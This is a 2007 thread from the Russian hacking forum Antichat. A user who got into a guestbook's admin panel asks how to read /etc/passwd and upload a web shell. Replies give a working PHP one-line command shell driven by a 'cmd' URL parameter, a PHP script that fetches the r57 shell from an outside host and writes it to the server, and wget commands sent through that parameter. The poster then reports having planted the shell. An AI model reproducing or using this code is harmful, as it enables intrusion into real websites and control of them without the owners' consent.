ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
Перезагрузить страницу Поправьте
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Поправьте
  #1  
Старый 01.08.2007, 16:30
Аватар для IIAHbI4
IIAHbI4
Banned
Регистрация: 24.08.2006
Сообщений: 483
Провел на форуме:
3895065

Репутация: 1112
Отправить сообщение для IIAHbI4 с помощью ICQ
По умолчанию Поправьте
Зашел в админку гостевухи
написал

PHP код:
<? if (isset($_GET['do'])) {
  readfile("/etc/passwd");
  die();
}
?>
в броузере пишу /guest.php?do
ничё не вылазает...
и ещё вопрос, как залить шелл?Вот так чтоль?-

PHP код:
<? system($_POST["cmd"])) 
 
?>
и потом в броузере /guest.php? POST: cmd=[command]
?

иль просто помогите r57 залить. спасиб
 
Ответить с цитированием

  #2  
Старый 01.08.2007, 16:39
Аватар для halkfild
halkfild
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию
1. да он читает файл..

2. мини-шелл))

PHP код:
<PRE>
<?
system($_GET["cmd"]);  
?>
</PRE>
или $_POST['cmd'] смотря как передаешь..

З.Ы.

у тя лишняя скобка и нет ;

system($_POST["cmd"])) ;

ну и
Код HTML:
<PRE></PRE>
добавь для нормального отображения
 
Ответить с цитированием

  #3  
Старый 01.08.2007, 16:44
Аватар для IIAHbI4
IIAHbI4
Banned
Регистрация: 24.08.2006
Сообщений: 483
Провел на форуме:
3895065

Репутация: 1112
Отправить сообщение для IIAHbI4 с помощью ICQ
По умолчанию
а если вот так:
[PHP]
<?php
$filen="httpL//www.xxx.ru/r57.php";
$file_new="shell.php";
$data = implode("", file($filen));
$fp = fopen($file_new, "w");
fputs($fp, $data);
fclose($fp);
?>
[PHP]
и потом guest/shell.php
 
Ответить с цитированием

  #4  
Старый 01.08.2007, 16:44
Аватар для Unli-M-iteD
Unli-M-iteD
Познающий
Регистрация: 02.07.2007
Сообщений: 39
Провел на форуме:
488774

Репутация: 30
Отправить сообщение для Unli-M-iteD с помощью ICQ
По умолчанию
/guest.php? POST: cmd=[command]
в таком виде и передавал?
 
Ответить с цитированием

  #5  
Старый 01.08.2007, 16:47
Аватар для IIAHbI4
IIAHbI4
Banned
Регистрация: 24.08.2006
Сообщений: 483
Провел на форуме:
3895065

Репутация: 1112
Отправить сообщение для IIAHbI4 с помощью ICQ
По умолчанию
Всё спасиб, я сам разобрался =)
PHP код:
<?
$filen="httpL//www.xxx.ru/r57.php";
$file_new="shell.php";
$data implode(""file($filen));
$fp fopen($file_new"w");
fputs($fp$data);
fclose($fp);
?>
вот это помогло =)

//хех... ведь могу думать,когда захочу )
 
Ответить с цитированием

  #6  
Старый 01.08.2007, 16:48
Аватар для Unli-M-iteD
Unli-M-iteD
Познающий
Регистрация: 02.07.2007
Сообщений: 39
Провел на форуме:
488774

Репутация: 30
Отправить сообщение для Unli-M-iteD с помощью ICQ
По умолчанию
Можно проще
Цитата:
<PRE>
<?
system($_GET["cmd"]);
?>
</PRE>
потом http://site.ru/guest.php?cmd=wget http://[адресс шела]
будет загружен в текущую директорию, если права позволяют
 
Ответить с цитированием

  #7  
Старый 01.08.2007, 16:49
Аватар для Piflit
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию
/guest.php?cmd=wget www.yoursite.ru/r57shell.php www.hackedsite.ru/shell.php
 
Ответить с цитированием

  #8  
Старый 01.08.2007, 16:56
Аватар для IIAHbI4
IIAHbI4
Banned
Регистрация: 24.08.2006
Сообщений: 483
Провел на форуме:
3895065

Репутация: 1112
Отправить сообщение для IIAHbI4 с помощью ICQ
По умолчанию
угу,всё норм, уже всё залил, снач шелл, щас ремвьюв....всё,

топикклоус
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ